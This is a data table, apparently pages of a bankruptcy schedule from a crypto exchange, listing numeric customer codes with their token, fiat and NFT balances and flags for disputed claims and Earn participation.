| 07386622 | | BTC[.00000001], CUSDT[5], DOGE[.00110697], TRX[1], USD[0.24] | Yes | |
| 07386624 | | GRT[2], USD[0.00] | | |
| 07386628 | | USD[0.00] | | |
| 07386632 | | DOGE[1339.2589291], TRX[1], USD[0.00] | | |
| 07386635 | | USD[10.00] | | |
| 07386639 | | BAT[1], BRZ[2], BTC[0], CUSDT[8], DAI[0], DOGE[1.00002663], ETH[0.02406067], ETHW[0.02406067], GRT[2], SHIB[2], SOL[0], TRX[1], USD[0.18], USDT[1] | | |
| 07386641 | | BRZ[1], CUSDT[3], DOGE[3], SHIB[3275348.61635774], TRX[1], USD[0.89] | Yes | |
| 07386643 | | USD[0.06] | | |
| 07386644 | | CUSDT[1045.6943411], DOGE[1389.17826424], LINK[3.99273818], MATIC[78.58334263], SOL[6.89630444], SUSHI[32.66090723], TRX[315.03392189], USD[0.00] | Yes | |
| 07386645 | | DOGE[140.62974845], USD[0.00] | | |
| 07386647 | | USD[0.00] | | |
| 07386648 | | USD[10.00] | | |
| 07386652 | | AAVE[0], BAT[0], BCH[0], BRZ[0], CUSDT[3], DOGE[0], GRT[0], KSHIB[0], LINK[0], LTC[0], SHIB[334321.51500453], SOL[0], SUSHI[0], TRX[93.47610627], UNI[0], USD[0.00], YFI[0] | | |
| 07386654 | | BRZ[1], DOGE[.00001437], TRX[1], USD[0.00] | | |
| 07386660 | | DOGE[.88705188], ETH[0.00095984], ETHW[0.00095984], MATIC[0], NFT (386292582864866991/Gym Rats #160)[1], NFT (484770844744281161/Miami Ticket Stub #969)[1], SOL[0], TRX[0], USD[7775.82], USDT[0.00000014] | | |
| 07386661 | | BRZ[1], BTC[0], CUSDT[6], DOGE[0], ETH[0], LTC[0], SOL[0], TRX[0], USD[0.00], USDT[1.10010532] | Yes | |
| 07386663 | | BTC[0], KSHIB[3.73], SUSHI[0], USD[0.28] | | |
| 07386668 | | DOGE[.07346429], USD[0.00] | | |
| 07386669 | | CUSDT[2], DOGE[197.30534506], KSHIB[40.29315569], TRX[2.06023415], USD[0.00] | Yes | |
| 07386670 | | CUSDT[5], DOGE[2], TRX[1], USD[0.01] | Yes | |
| 07386673 | | USD[10.00] | | |
| 07386676 | | BTC[.00804345], CUSDT[8], DOGE[406.34878503], ETH[.07496025], ETHW[.07496025], LTC[.637449], TRX[1], USD[5.00] | | |
| 07386685 | | USD[10.00] | | |
| 07386686 | | NFT (349974090194229401/Australia Ticket Stub #2408)[1], NFT (383371273971891622/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #57)[1], NFT (428068579128776384/Barcelona Ticket Stub #2354)[1], NFT (553374719091919446/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #42)[1], SHIB[1], SOL[.00001093], SUSHI[.00245496], USD[0.00], USDT[0] | Yes | |
| 07386689 | | CUSDT[3], DOGE[1071.88023747], USD[100.00] | | |
| 07386691 | | BTC[.00182791], CUSDT[1842.78620918], DOGE[4392.94586388], ETH[.0951134], ETHW[.09407599], GRT[73.79860372], LTC[.04562454], TRX[744.21936298], USD[0.00] | Yes | |
| 07386694 | | CUSDT[1], USD[0.00] | | |
| 07386695 | | DOGE[91.33456308], GRT[2.3009329], USD[0.00] | | |
| 07386699 | | BAT[2229.39945761], BRZ[1], BTC[.3427455], CUSDT[5], DOGE[3442.8773482], ETH[1.46309874], ETHW[1.46249216], GRT[3.1338078], SHIB[52088605.46756643], TRX[2], USD[0.00], USDT[2.156116311] | Yes | |
| 07386702 | | CUSDT[2], USD[0.00] | Yes | |
| 07386704 | | CUSDT[4], DOGE[1], TRX[3], USD[0.01] | Yes | |
| 07386705 | | BAT[1], CUSDT[1], DOGE[2900.22207425], USD[0.00] | | |
| 07386709 | Contingent, Disputed | USD[0.01], USDT[0] | Yes | |
| 07386711 | | BTC[0.03465598], DOGE[9012.89649839], SHIB[18045875.9555811], SOL[10.34181309], UNI[3.71486941], USD[0.06], USDT[0] | Yes | |
| 07386712 | | BTC[.00016007], DOGE[176.07304669], USD[0.00] | | |
| 07386714 | | CUSDT[2], DOGE[1], GRT[1], TRX[1], USD[0.00] | | |
| 07386718 | | BTC[0], NFT (413023842323809879/Saudi Arabia Ticket Stub #1358)[1], USD[0.00], USDT[0] | | |
| 07386723 | | USD[0.00] | | |
| 07386724 | | BAT[1.0165555], GRT[1.00498957], USD[0.00] | Yes | |
| 07386726 | | BAT[1], BRZ[1], CUSDT[5], DOGE[1122.69092691], GRT[2], TRX[4], USD[0.00], USDT[1] | | |
| 07386729 | | CUSDT[6], TRX[1], USD[0.01] | Yes | |
| 07386731 | | SOL[1.25145256], USD[0.00] | | |
| 07386732 | | CUSDT[9], ETH[.00000015], ETHW[.00000015], GRT[1], SHIB[0], TRX[12], USD[0.00], USDT[0] | | |
| 07386733 | | BAT[1.0165555], CUSDT[5], DOGE[9318.25278568], ETH[1.10391492], ETHW[1.10345124], LTC[1.20405932], SHIB[389791.84669362], SOL[3.92574169], TRX[2], USD[0.00] | Yes | |
| 07386738 | | USD[9.98] | | |
| 07386744 | | BRZ[2], CUSDT[3], TRX[2], USD[0.00] | Yes | |
| 07386745 | | BTC[0], SOL[.00245], USD[0.76] | | |
| 07386746 | | DOGE[1001.5454974], USD[0.00] | | |
| 07386751 | | BRZ[0], BTC[0.00010562], CUSDT[3], DOGE[126.45845543], ETH[0], KSHIB[152.90814471], LINK[0], SHIB[152044.8830992], SOL[0], SUSHI[0], USD[0.00], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07386753 | Contingent, Disputed | USD[0.01] | Yes | |
| 07386758 | | USD[0.00] | | |
| 07386760 | | USD[10.00] | | |
| 07386764 | | BTC[0], CUSDT[34], DOGE[0], GRT[0], LINK[0], SHIB[30.18335651], TRX[0], USD[0.00] | Yes | |
| 07386765 | | USD[10.00] | | |
| 07386766 | Contingent, Disputed | DOGE[0], USD[0.00] | | |
| 07386776 | | CUSDT[7], DOGE[1], TRX[8], USD[0.00], USDT[1] | | |
| 07386780 | | BTC[.00011035], DOGE[2], SOL[.0000379], USD[0.00] | Yes | |
| 07386783 | | BRZ[1], CUSDT[4.57111607], DOGE[.0003923], TRX[.00000034], USD[172.41] | | |
| 07386784 | | USD[10.00] | | |
| 07386786 | | CUSDT[2], DOGE[1], GRT[10.05603017], LINK[.78276422], SOL[.41423871], SUSHI[.81823729], USD[0.90] | Yes | |
| 07386790 | | DOGE[1], USD[0.00] | | |
| 07386792 | | GRT[4.84583151], USD[0.00] | | |
| 07386793 | | CUSDT[1], DOGE[.00000401], USD[0.00] | | |
| 07386795 | | TRX[1], USD[0.00] | | |
| 07386799 | | BAT[1.0165555], BRZ[1], CUSDT[5], DOGE[1], USD[0.00] | Yes | |
| 07386805 | | DOGE[37.56766076], USD[0.00] | | |
| 07386808 | | BAT[.00000916], DOGE[31.01075982], USD[0.02] | Yes | |
| 07386809 | | CUSDT[2], DOGE[1], SHIB[1], USD[0.00] | | |
| 07386811 | | SOL[.06083776], USD[0.00] | | |
| 07386812 | | DOGE[281.64322304], USD[0.00] | | |
| 07386814 | | ETH[.00557741], ETHW[.00557741], USD[0.00] | | |
| 07386815 | | BTC[0], DAI[0], ETH[0], NFT [423727860778574003/Imola Ticket Stub #613][1], SOL[0.00000001], USD[0.00] | | |
| 07386816 | | NFT [381502769684709000/Coachella x FTX Weekend 1 #11038][1] | | |
| 07386918 | | CUSDT[2], DOGE[.00078687], TRX[1], USD[44.97] | | |
| 07386822 | | BAT[1], SHIB[358612.23797527], TRX[1], USD[0.01] | Yes | |
| 07386825 | Contingent, Disputed | USD[0.07] | | |
| 07386827 | | USD[0.00] | | |
| 07386831 | | DOGE[140.92307432], USD[0.00] | | |
| 07386833 | | BAT[0], DOGE[0], ETH[0], LINK[0], SOL[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07386835 | | DOGE[879.24501692], TRX[1], USD[0.00] | | |
| 07386838 | | DOGE[1540.02351111], NFT [339075356769636412/FTX - Off The Grid Miami #1351][1], NFT [541142461035200077/Entrance Voucher #1913][1], SOL[44.41994497], USD[0.00] | Yes | |
| 07386839 | | BRZ[5.07952967], CUSDT[25], DOGE[1.00176927], GRT[51.64177204], TRX[11.07204279], USD[0.00], USDT[0] | Yes | |
| 07386841 | | BCH[.000332], BTC[.0000061], GRT[.458], LTC[0], SUSHI[0.18600000], TRX[.269], USD[2.10], USDT[0] | | |
| 07386851 | | BAT[19.02033736], USD[0.00] | | |
| 07386855 | | BAT[.00000001], ETH[.00000001], ETHW[0], NFT [488598683956782877/Saudi Arabia Ticket Stub #1773][1], SHIB[2], USD[0.61] | Yes | |
| 07386856 | | SOL[.52764722], USD[0.00] | | |
| 07386857 | | AAVE[0], BAT[0], BCH[0], BTC[0], DOGE[0], ETH[0], KSHIB[0], MATIC[0], SHIB[0], SOL[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07386862 | | BAT[1.0165555], BRZ[3], CUSDT[54.26104304], DOGE[12019.76072664], SHIB[16560327.53481866], SOL[.67308646], SUSHI[.00001774], TRX[2], USD[0.00] | Yes | |
| 07386863 | | BRZ[1], CUSDT[2], DOGE[1], SHIB[1], USD[12.19] | Yes | |
| 07386864 | | BTC[.0014], USD[0.27] | | |
| 07386869 | | CUSDT[2], DOGE[140.48208037], USD[0.00] | | |
| 07386871 | | CUSDT[3.00147451], DOGE[0], SOL[0], USD[0.00] | Yes | |
| 07386873 | | BAT[3.71662265], CUSDT[833.3047603], DOGE[486.83802084], TRX[108.96575943], USD[0.00] | Yes | |
| 07386875 | | CUSDT[4], DOGE[1], USD[0.01] | Yes | |
| 07386876 | | USD[10.00] | | |
| 07386880 | | BAT[1], BRZ[2], CUSDT[3], DOGE[38870.12589022], LINK[1], NFT [302194127781401614/Coachella x FTX Weekend 1 #27792][1], TRX[3278.07804415], USD[0.00], USDT[3] | | |
| 07386881 | | DOGE[26.56194178], USD[0.00] | | |
| 07386883 | | BF_POINT[100], BRZ[3], CUSDT[1], DOGE[1.59633657], KSHIB[.0000298], LTC[0], SHIB[3], TRX[0], USD[482.49], USDT[0] | | |
| 07386884 | | BRZ[3], BTC[.09687987], CUSDT[2], DOGE[4.03577845], GRT[107.94864977], SOL[89.98281992], SUSHI[29.50940667], TRX[1], USD[0.00] | Yes | |
| 07386885 | | BAT[1.01337619], BRZ[2], CUSDT[5], DAI[.00000001], DOGE[16.75756209], GRT[0], MATIC[0], SHIB[95.79980013], SOL[0], TRX[6], USD[0.00], USDT[1.08153699] | Yes | |
| 07386887 | | BTC[0], DOGE[0], LINK[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07386888 | | BAT[1], CUSDT[3], DOGE[1.00000461], TRX[2], USD[0.00], USDT[1] | | |
| 07386890 | | USD[10.00] | | |
| 07386891 | | CUSDT[1], DOGE[3], TRX[2], USD[0.00] | | |
| 07386894 | | DOGE[1], ETHW[1.98442063], TRX[1], USD[0.00] | Yes | |
| 07386902 | | USD[10.00] | | |
| 07386904 | | BTC[0], LINK[0], SHIB[2], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07386906 | | USD[447.75], USDT[0] | | |
| 07386908 | | USD[0.34] | | |
| 07386909 | | LTC[0], USD[0.96] | | |
| 07386911 | | BRZ[2], BTC[.02112213], CUSDT[6], DOGE[2951.97838647], ETH[.65186797], ETHW[.65186797], GRT[1], TRX[4], USD[1420.55], YFI[.00512071] | | |
| 07386912 | | DOGE[1], GRT[137.03153124], TRX[969.1795816], USD[1.64] | | |
| 07386914 | | CUSDT[1], SOL[0], USD[0.00] | | |
| 07386916 | | USD[10.00] | | |
| 07386919 | | BTC[0], TRX[.000472], USD[81.90], USDT[0.00071500] | | |
| 07386920 | | BAT[1], BRZ[1], CUSDT[4], TRX[2], USD[0.01] | | |
| 07386921 | | DOGE[136.24522068], USD[0.00] | | |
| 07386922 | | USD[0.01] | | |
| 07386926 | | USD[10.00] | | |
| 07386929 | | CUSDT[2], DOGE[250.14897783], USD[0.00] | Yes | |
| 07386932 | | CUSDT[1], USD[10.00] | | |
| 07386936 | | BAT[69.20658318], CUSDT[5], SHIB[1], USD[0.01], USDT[0] | Yes | |
| 07386939 | | BRZ[1], CUSDT[1], DOGE[.13633732], USD[0.86] | | |
| 07386940 | | ETHW[.00457656], USD[0.00] | Yes | |
| 07386950 | | CUSDT[3], DOGE[3018.92874817], GRT[1], TRX[1], USD[0.00] | | |
| 07386951 | | CUSDT[1], USD[0.01] | | |
| 07386953 | | DOGE[1], TRX[4], USD[61.55] | Yes | |
| 07386955 | | NFT (528721138179421993/Entrance Voucher #29579)[1], NFT (551667056855830937/Humpty Dumpty #741)[1] | Yes | |
| 07386956 | | BRZ[1], CUSDT[2], DOGE[179.88276549], USD[0.80] | | |
| 07386957 | | USD[10.00] | | |
| 07386962 | | DOGE[255.61119052], USD[1.00] | | |
| 07386963 | | CUSDT[2], USD[0.00] | | |
| 07386967 | | BTC[.0000011], CUSDT[7], DOGE[.8946442], SHIB[3], USD[0.64] | | |
| 07386968 | | USD[0.00] | | |
| 07386969 | | ETH[2.718092], ETHW[2.718092], LINK[.022], SOL[221.11197], USD[21.14] | | |
| 07386970 | | DOGE[1], USD[0.01], USDT[0] | | |
| 07386972 | | DOGE[1501.09771402], TRX[1], USD[0.00] | | |
| 07386976 | | CUSDT[1], DOGE[349.3939547], USD[0.90] | Yes | |
| 07386979 | | DOGE[.30428375], SOL[0], USD[0.49] | | |
| 07386980 | | BCH[0.07275259], CUSDT[4], DOGE[1], LTC[0.27027183], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07386982 | | DOGE[2], SOL[.68141821], USD[0.20] | | |
| 07386985 | | BRZ[1], BTC[.00131616], CUSDT[3], DOGE[608.99930521], ETH[.0055289], ETHW[.0055289], TRX[1], USD[68.35] | | |
| 07386991 | | LINK[0], SOL[0], USD[0.01], USDT[0] | Yes | |
| 07386995 | | BAT[1.0165555], BRZ[0], BTC[0], CUSDT[1], DOGE[1], ETH[1.11127373], ETHW[1.11080690], GRT[2.08188727], LINK[19.5832608], SOL[15.9826489], TRX[1], UNI[0], USD[0.00], USDT[0.00000008] | Yes | |
| 07386996 | | SUSHI[0], USD[0.00] | | |
| 07386997 | | USD[10.00] | | |
| 07386999 | | USD[0.00] | | |
| 07387000 | | BTC[.00002233], ETH[.00057615], ETHW[.00057615], USD[8.06] | | |
| 07387001 | | BRZ[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07387002 | | ETH[0], NFT (512086983994707667/Pool day at Circa )[1], SHIB[3], USD[0.00] | Yes | |
| 07387004 | | BAT[0], BTC[0], ETH[0], LINK[0], LTC[0], NFT (348431269141469365/2122)[1], NFT (372724514099624906/2087)[1], SOL[0], SUSHI[0], USD[6.25] | | |
| 07387010 | | USD[0.01] | | |
| 07387011 | | BRZ[62.31233013], DOGE[3], EUR[9.25], TRX[80.2751511], USD[0.00], YFI[.00012438] | | |
| 07387014 | | USD[0.00] | | |
| 07387015 | | BTC[.00007147], GRT[.78], USD[1.60] | | |
| 07387017 | | USD[0.00] | | |
| 07387027 | | CUSDT[1], DOGE[1.00002592], USD[0.01] | | |
| 07387028 | | DOGE[0], USD[0.01] | | |
| 07387029 | | BTC[.00019312], USD[0.00] | | |
| 07387032 | | USD[10.00] | | |
| 07387034 | | USD[10.00] | | |
| 07387040 | | DOGE[1.11305164], USD[0.00] | | |
| 07387041 | | BRZ[1], DOGE[1801.07177018], GRT[1], USD[0.00] | | |
| 07387046 | | CUSDT[2], TRX[2], USD[0.00], USDT[0] | | |
| 07387048 | | USD[0.01], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07387049 | | USD[10.00] | | |
| 07387050 | | CUSDT[1], DOGE[27791.07667636], SHIB[10157440.32503809], USD[0.00] | | |
| 07387051 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07387052 | | SOL[0], USD[2500.00] | | |
| 07387053 | | SHIB[1], USD[0.00] | Yes | |
| 07387054 | | USD[0.18] | | |
| 07387056 | | BCH[.00023273], BTC[.00000131], DOGE[.00696153], ETH[.00032008], ETHW[.59432008], LINK[.00694102], SOL[.00934906], UNI[.00278577], USD[939.51] | | |
| 07387057 | | BAT[1], BRZ[1], DOGE[3], SOL[.0000362], TRX[2], USD[0.00], USDT[1] | | |
| 07387061 | | DOGE[1.00017799], TRX[1], USD[0.08] | | |
| 07387063 | | DOGE[99.32814089], USD[0.00] | Yes | |
| 07387066 | | CUSDT[1], DOGE[2], USD[0.00] | | |
| 07387067 | | USD[0.00] | | |
| 07387068 | | BCH[.121878], BTC[.07294676], ETH[.83442564], ETHW[0.83442564], GRT[39.96], LINK[8.5914], MATIC[409.59], SOL[4.9956], SUSHI[43.4565], TRX[3030.903], UNI[15.3846], USD[107.80], YFI[.001998] | | |
| 07387070 | | TRX[.26540399], USD[0.00] | | |
| 07387072 | | BAT[.00117495], DOGE[1], USD[11.25] | | |
| 07387076 | | CUSDT[1], DOGE[18.12407566], TRX[1], USD[1.99] | | |
| 07387077 | | SOL[.0027], USD[20867.01] | | |
| 07387079 | | USD[0.00] | | |
| 07387085 | | CUSDT[6], TRX[2], USD[0.00] | | |
| 07387086 | | BTC[.00001613] | | |
| 07387087 | | BTC[.00107866] | | |
| 07387091 | | USD[0.00] | | |
| 07387094 | | CUSDT[1], DOGE[165.24104192], GRT[4.5219007], SOL[1.17993862], USD[0.00] | | |
| 07387103 | | CUSDT[2], NFT (389288692301736710/Coachella x FTX Weekend 2 #21862)[1], TRX[1], USD[0.00] | | |
| 07387106 | | BCH[.10324864], BRZ[1], BTC[.00504799], CUSDT[7], DOGE[4660.27426365], ETH[.1575884], ETHW[.15694603], LINK[10.99829049], SHIB[6024012.70147239], SOL[4.49682554], TRX[490.71515449], USD[0.00] | Yes | |
| 07387109 | | DOGE[1360.3433719], USD[0.00] | | |
| 07387110 | | USD[10.00] | | |
| 07387112 | | USD[10.00] | | |
| 07387117 | | ETH[.00000001], ETHW[0], SOL[.009], USD[2.60], USDT[.0071808] | | |
| 07387131 | | GRT[7.87704636], USD[0.00] | | |
| 07387135 | | BRZ[1], CUSDT[9], DOGE[1.00001875], TRX[1], USD[0.00] | | |
| 07387136 | | BF_POINT[300], DOGE[1], GRT[.00020193], TRX[1], USD[0.00] | Yes | |
| 07387137 | | BAT[6.4732409], BRZ[7.55211444], CUSDT[10], GRT[3.10021221], SOL[1.0788735], TRX[13.17858426], USD[0.01], USDT[6.47324090] | Yes | |
| 07387138 | | CUSDT[1], DOGE[543.77459031], TRX[1], USD[0.75] | | |
| 07387141 | | USD[3.90] | | |
| 07387142 | | USD[2.26], USDT[0] | | |
| 07387143 | | CUSDT[1], DOGE[1.75200699], TRX[1.00004307], USD[0.00] | | |
| 07387145 | | DOGE[141.5041409], GRT[10.07425731], UNI[.69583906], USD[0.00] | | |
| 07387151 | | CUSDT[1], USD[0.00] | | |
| 07387154 | | BTC[.00021363], USD[0.00] | | |
| 07387155 | | BTC[0], CUSDT[1], SHIB[2], TRX[1], USD[0.01], USDT[0] | Yes | |
| 07387156 | | CUSDT[2], DOGE[7300.1917356], SHIB[8678813.52243189], TRX[2], USD[0.00] | Yes | |
| 07387158 | | DOGE[1], ETHW[.00002756], USD[0.00] | Yes | |
| 07387161 | | DOGE[698.17446344], USD[0.00] | | |
| 07387163 | | DOGE[270.14910429], USD[0.00] | | |
| 07387164 | | BRZ[2], CUSDT[10], DOGE[1371.97173511], GRT[1.00367791], SHIB[981683.34809575], SOL[0], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07387166 | | BTC[0], CUSDT[1], DOGE[1], SHIB[0], USD[0.00] | | |
| 07387171 | | USD[10.00] | | |
| 07387174 | | USD[10.00] | | |
| 07387176 | | DOGE[1], TRX[1], USD[0.01] | Yes | |
| 07387177 | | ETH[3.13799703], ETHW[3.13765314] | Yes | |
| 07387179 | | BAT[1], BRZ[1], BTC[0.00000006], CUSDT[1], TRX[2], USD[0.01], USDT[0.00000001] | Yes | |
| 07387185 | | BTC[.00096768], CUSDT[10], DOGE[90.94837591], SHIB[1], USD[20.09] | Yes | |
| 07387187 | | CUSDT[1], DOGE[1.23142761], ETH[0], USD[17.85] | Yes | |
| 07387188 | | DAI[0], DOGE[190.50400038], USD[0.00] | | |
| 07387190 | | USD[10.00] | | |
| 07387191 | | CUSDT[1], DOGE[36.10939671], USD[0.00] | | |
| 07387194 | | DOGE[1], USD[0.01], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07387195 | | DOGE[.70753331], USD[0.01] | | |
| 07387200 | | CUSDT[1], USD[0.00] | | |
| 07387208 | | USD[10.00] | | |
| 07387209 | | GRT[8.95645751], USD[0.00] | | |
| 07387220 | | USDT[498.958925] | | |
| 07387221 | | DOGE[134.87218904], USD[0.00] | | |
| 07387222 | | NFT (291106061995942042/Japan Ticket Stub #74)[1], NFT (323978768262561078/The Hill by FTX #5176)[1], NFT (365420385153210796/Monza Ticket Stub #56)[1], NFT (374811047507011708/FTX Crypto Cup 2022 Key #1047)[1], NFT (387918929958334723/Austin Ticket Stub #180)[1], NFT (393906865845538083/Netherlands Ticket Stub #83)[1], NFT (530062109315041377/Mexico Ticket Stub #73)[1], NFT (570969317532688581/Singapore Ticket Stub #46)[1] | | |
| 07387223 | | ETH[.00542326], ETHW[.00542326], USD[0.00] | | |
| 07387226 | | USD[567.54] | | |
| 07387227 | | CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07387228 | | AVAX[.081], BTC[0.00015862], DOGE[.72892], ETH[0], ETHW[0], LINK[.0582], LTC[.0098128], SOL[0.01054211], SUSHI[.392], TRX[.81596], USD[0.31], USDT[0.02434424] | | |
| 07387232 | | ETH[.00613693], ETHW[.00605485], USD[0.00] | Yes | |
| 07387238 | | BRZ[1], BTC[.21957073], CUSDT[7], DOGE[3705.5995733], ETH[1.87077956], ETHW[1.68136409], GRT[1], SHIB[1], SOL[1.69686972], TRX[6], USD[2601.47] | Yes | |
| 07387242 | | CUSDT[1], GRT[4.64672994], USD[0.00] | | |
| 07387244 | | CUSDT[3], SHIB[2], TRX[6], USD[0.00] | Yes | |
| 07387246 | | BTC[0], ETH[0.00000001], ETHW[0], NFT (508752180085629252/Infinite Block)[1], SOL[0.00000001], TRX[.000014], USD[0.00], USDT[0] | | |
| 07387250 | | BRZ[2], ETHW[.02673574], NEAR[.00091618], UNI[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07387251 | | USD[2180.47] | | |
| 07387252 | | CUSDT[2], DOGE[923.2926431], USD[0.00] | | |
| 07387254 | | USD[0.00] | | |
| 07387266 | | CUSDT[1], DOGE[0] | | |
| 07387267 | | BTC[0] | | |
| 07387277 | | CUSDT[7], DOGE[202.10276014], TRX[2], USD[0.00] | | |
| 07387289 | | CUSDT[469.33681768], USD[0.00] | | |
| 07387290 | | BTC[.01603558], CUSDT[11], DOGE[2], ETH[.04772639], ETHW[.04713559], KSHIB[557.56008732], MATIC[32.43539659], SHIB[1662.83925578], SOL[7.18266988], TRX[3], USD[0.00] | Yes | |
| 07387298 | | DOGE[8.39006501], USD[0.00] | | |
| 07387303 | | SOL[.03208438], USD[35.68] | | |
| 07387308 | | BAT[1], BRZ[5], CUSDT[10], DOGE[4], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[0], SOL[0], SUSHI[0], TRX[6], USD[0.01], USDT[0.00000001] | | |
| 07387309 | | BAT[3.23812094], BRZ[2], CUSDT[10], DOGE[3], ETH[0], GRT[1.00281675], LINK[0], SOL[0], TRX[1.02261267], USD[223.73], USDT[1.09469379] | Yes | |
| 07387310 | | BAT[1.01655549], BRZ[1], BTC[0], CUSDT[24], DOGE[1], ETH[0], GRT[2.61261303], LINK[0], TRX[6], USD[0.00], USDT[0.00037011] | Yes | |
| 07387312 | | BRZ[1], CUSDT[2], USD[0.01] | | |
| 07387315 | | BAT[110.77484545], DOGE[698.90206451], TRX[1], USD[0.00] | | |
| 07387318 | | USD[10.00] | | |
| 07387319 | | USD[50.01] | | |
| 07387320 | | DOGE[1], USD[0.00] | | |
| 07387322 | | ETH[0.00000001], ETHW[0], USD[0.00] | Yes | |
| 07387324 | | DOGE[56.61166731], USD[0.00] | | |
| 07387325 | | BTC[0], USD[0.00] | Yes | |
| 07387327 | | USD[10.00] | | |
| 07387328 | | BTC[0], CUSDT[2], USD[0.01], USDT[0.00000001] | | |
| 07387331 | | BRZ[1], CUSDT[3], TRX[1], USD[0.00] | | |
| 07387333 | | BRZ[3], USD[0.07] | | |
| 07387336 | | TRX[.000001] | | |
| 07387337 | | BRZ[1], CUSDT[4], DOGE[456.05500906], TRX[2], USD[0.00] | | |
| 07387339 | | USD[10.00] | | |
| 07387344 | | ETH[0], ETHW[0], USD[0.23], USDT[0] | | |
| 07387347 | | SOL[0] | | |
| 07387350 | | CUSDT[3], TRX[1], USD[0.00] | | |
| 07387353 | | BAT[1], CUSDT[1], DOGE[8803.07702339], USD[0.00], USDT[1] | | |
| 07387359 | | BRZ[1], CUSDT[25], DOGE[5664.89514834], ETH[.50598941], ETHW[.50598941], TRX[3], USD[0.01] | | |
| 07387360 | | SOL[0.02601683], USD[0.00] | | |
| 07387364 | | BRZ[1], CUSDT[0], DOGE[128.14513413], SHIB[1], TRX[.50542844], USD[3599.42] | Yes | |
| 07387365 | | USD[0.00] | | |
| 07387372 | | USD[5.00] | | |
| 07387373 | | ETH[.000429], ETHW[.1], TRX[.000007], USD[1228.96] | | |
| 07387376 | | USD[0.00] | | |
| 07387378 | | DOGE[2], SHIB[1], TRX[2], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07387380 | | DOGE[138.87839585], USD[0.00] | | |
| 07387382 | | BRZ[2], CUSDT[1], USD[0.00] | Yes | |
| 07387383 | | CUSDT[2], DOGE[.00003077], SOL[.00056656], TRX[1], USD[0.00] | | |
| 07387385 | | BTC[0.00002128], LTC[.00649909], USD[1.22] | | |
| 07387389 | | USD[10.00] | | |
| 07387392 | | CUSDT[1], DOGE[23.1370428], USD[0.00] | Yes | |
| 07387393 | | DOGE[6277.32748699], USD[0.00] | | |
| 07387395 | | USD[10.00] | | |
| 07387396 | | ALGO[1.998], BTC[0.00007132], USD[0.07] | | |
| 07387402 | | BRZ[1], DOGE[2.00069011], GRT[0.00001262], USD[0.01] | | |
| 07387409 | | BAT[1], BTC[0], CUSDT[1], DOGE[0], GRT[1], USD[0.00] | | |
| 07387411 | | USD[11.06] | Yes | |
| 07387415 | | USD[0.00] | | |
| 07387418 | | BTC[0.00023881], USD[0.00] | | |
| 07387419 | | AAVE[0.00000001], BTC[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], MATIC[0], MKR[0], NFT (35576848530583735/Entrance Voucher #3201)[1], PAXG[0], SOL[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07387423 | | USD[0.00] | | |
| 07387425 | | ETHW[.567432], USD[1.57] | | |
| 07387426 | | AVAX[24.44380665], SOL[382.28249871], USD[0.00] | | |
| 07387428 | | USD[0.00] | | |
| 07387435 | | USD[0.43] | | |
| 07387438 | | ALGO[0], BTC[0], ETH[0], LTC[0], MATIC[10.19668209], NFT (29772988412540975/Austin Ticket Stub #94)[1], NFT (310366626837774105/Singapore Ticket Stub #41)[1], NFT (332939522462884175/Mexico Ticket Stub #72)[1], NFT (353300003821694518/Barcelona Ticket Stub #2372)[1], NFT (413928089679551181/The Hill by FTX #5168)[1], NFT (446755465644927045/Monza Ticket Stub #47)[1], NFT (448331743231164298/Japan Ticket Stub #72)[1], NFT (454098034067291432/Hungary Ticket Stub #64)[1], NFT (479977691126586655/Belgium Ticket Stub #217)[1], NFT (492873113412108595/Netherlands Ticket Stub #82)[1], NFT (565972831985570211/FTX Crypto Cup 2022 Key #874)[1], SHIB[3], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07387446 | | USD[0.00] | | |
| 07387449 | | BCH[.34825993], BRZ[1], DOGE[2672.82770542], TRX[1], UNI[1.30369497], USD[0.00] | | |
| 07387450 | | USD[0.00], USDT[0] | | |
| 07387453 | | BAT[2], BRZ[12.09633006], DOGE[10.49553435], GRT[1], LINK[0], PAXG[.00028654], TRX[47727.93274662], USD[2458.63], USDT[10.98792072] | Yes | |
| 07387459 | | USD[0.01] | | |
| 07387462 | | GRT[1], USD[0.00] | | |
| 07387465 | | GRT[9.3084229], TRX[1], USD[0.00] | | |
| 07387466 | | BRZ[1], BTC[.04356964], CUSDT[28], DOGE[9.52326096], ETH[.22891227], ETHW[.22870745], LINK[1.11894714], LTC[.17723526], SOL[8.48715998], SUSHI[6.29320373], TRX[326.311039], UNI[1.19707927], USD[0.34], YFI[.0046124] | Yes | |
| 07387468 | | BTC[0], ETH[.0009], ETHW[.0009], USD[4.53] | | |
| 07387474 | | USD[10.00] | | |
| 07387476 | | USD[0.00] | | |
